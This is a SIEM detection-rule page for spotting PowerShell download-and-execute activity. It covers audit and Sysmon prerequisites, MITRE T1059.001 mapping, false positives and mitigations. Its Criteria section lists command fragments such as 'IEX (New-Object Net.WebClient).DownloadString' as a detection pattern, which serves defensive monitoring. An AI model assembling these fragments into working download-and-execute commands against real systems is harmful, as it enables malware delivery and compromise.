Suspicious PowerShell Download and Execute Pattern
Last updated on:
In this page
About the rule
Rule Type
Standard
Rule Description
Detects suspicious PowerShell commands that use the .NET WebClient object to download and execute scripts or files from remote locations, a pattern commonly used in malicious scripts, stagers, or downloaders.
Severity
Trouble
Rule journey
Attack chain scenario
Execution: Command and Scripting Interpreter - PowerShell (T1059.001)
Impact
Execution of malicious code resulting in system compromise, data theft, or further malware deployment.
Rule Requirement
Prerequisites
Using Windows Event Viewer
- Open GPMC, create/edit a GPO.
- Navigate to:
Computer Configuration → Policies → Windows Settings → Security Settings → Advanced Audit Policy Configuration → Audit Policies → Detailed Tracking - Enable:
- Audit Process Creation → Success
- Audit Process Termination → Success
- To log command lines:
Computer Configuration → Administrative Templates → System → Audit Process Creation
Enable Include command line in process creation events - Create registry key:
Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Microsoft-Windows-Security-Auditing\Operational
Using Sysmon
- Download & install Sysmon from Sysinternals.
- Run it with a config file that includes process creation.
- Sample config must include ProcessCreate event.
- Create registry key:
Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Microsoft-Windows-Sysmon\Operational
Criteria
Action1:
actionname = "Process started" AND COMMANDLINE contains "IEX ((New-Object Net.WebClient).DownloadString,IEX (New-Object Net.WebClient).DownloadString,IEX((New-Object Net.WebClient).DownloadString,IEX(New-Object Net.WebClient).DownloadString, -command (New-Object System.Net.WebClient).DownloadFile(, -c (New-Object System.Net.WebClient).DownloadFile("
select Action1.HOSTNAME,Action1.MESSAGE,Action1.COMMANDLINE,Action1.FILE_NAME,Action1.PROCESSNAME,Action1.USERNAME,Action1.PARENTPROCESSNAME,Action1.DOMAIN,Action1.ORIGINALFILENAME,Action1.PARENTPROCESSID,Action1.PROCESSID,Action1.PRODUCT_NAME,Action1.SECURITYID
Detection
Execution Mode
realtime
Log Sources
Windows
MITRE ATT&CK
T1059.001: Command and Scripting Interpreter - PowerShell
Security Standards
Antivirus/Antimalware solutions to detect and quarantine suspicious scripts. Enforce PowerShell execution policies to permit only signed scripts. Restrict or disable PowerShell and WinRM where not needed. Use application control and PowerShell Constrained Language Mode to limit dangerous commands. Privileged account management, including Just Enough Administration (JEA).
Author
Florian Roth (Nextron Systems)
Future actions
Known False Positives
Legitimate software installers or updaters that download and execute packages remotely can trigger this detection.
Next Steps
Review PowerShell command executions involving downloadstring or downloadfile for suspicious activity. Harden PowerShell usage policies to restrict execution to authorized administrators. Monitor process creation and network traffic for anomalous or unauthorized downloads. Educate users on PowerShell best practices and risks. Deploy endpoint detection solutions with behavioral analytics.
Mitigation
Mitigation ID | Name | Description |
|---|---|---|
M1049 | Antivirus/Antimalware | Use antivirus solutions to detect and quarantine malicious PowerShell scripts that download and execute remote code. |
M1045 | Code Signing | Enforce PowerShell execution policies to allow only signed scripts, reducing risk from unauthorized script execution. |
M1042 | Disable or Remove Feature | Remove or restrict PowerShell and WinRM in environments where not needed to reduce remote execution attack surface. |
M1038 | Execution Prevention | Utilize application control and PowerShell Constrained Language Mode to restrict execution of potentially harmful commands and scripts. |
M1026 | Privileged Account Management | Limit PowerShell script execution rights to administrators via Just Enough Administration (JEA) to decrease attack surface. |
